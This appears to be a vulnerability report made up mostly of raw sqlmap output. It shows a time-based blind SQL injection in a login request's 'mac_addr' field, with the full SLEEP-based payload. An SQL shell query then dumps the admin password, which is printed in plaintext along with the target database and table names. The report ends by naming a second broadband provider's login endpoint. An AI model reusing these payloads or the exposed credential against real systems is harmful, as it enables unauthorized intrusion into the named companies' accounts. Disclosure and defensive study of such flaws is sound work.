sqlmap identified the following injection point(s) with a total of 169 HTTP(s) requests: --- Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: {"localMac":"a4:3d:78:a0:3d:da","curr_version":"0","mac_addr":"11' AND (SELECT * FROM (SELECT(SLEEP(5)))fhLF) AND 'Qxuc'='Qxuc","wk_password":"eeee","login_type":"wk_no"} --- web application technology: PHP 5.3.3 back-end DBMS: MySQL 5.0.12 sqlmap resumed the following injection point(s) from stored session: --- Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: {"localMac":"a4:3d:78:a0:3d:da","curr_version":"0","mac_addr":"11' AND (SELECT * FROM (SELECT(SLEEP(5)))fhLF) AND 'Qxuc'='Qxuc","wk_password":"eeee","login_type":"wk_no"} --- web application technology: PHP 5.3.3 back-end DBMS: MySQL >= 5.0.0 sqlmap resumed the following injection point(s) from stored session: --- Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: {"localMac":"a4:3d:78:a0:3d:da","curr_version":"0","mac_addr":"11' AND (SELECT * FROM (SELECT(SLEEP(5)))fhLF) AND 'Qxuc'='Qxuc","wk_password":"eeee","login_type":"wk_no"} --- web application technology: PHP 5.3.3 back-end DBMS: MySQL >= 5.0.0 Database: xack Table: t_user --sql-shell select password from t_user where user_name = 'admin'; #直接获取明文admin密码 admin/byod@xa
使用 admin/byod@xa直接登录 http://
******.*******
#2深圳长城宽带 http://
******.*******
app下载: http://
******.*******
download/cckd.apk
POST /szck/index.php/login/user_login HTTP/1.1 Content-Length: 105 Content-Type: text/plain; charset=UTF-8 Host: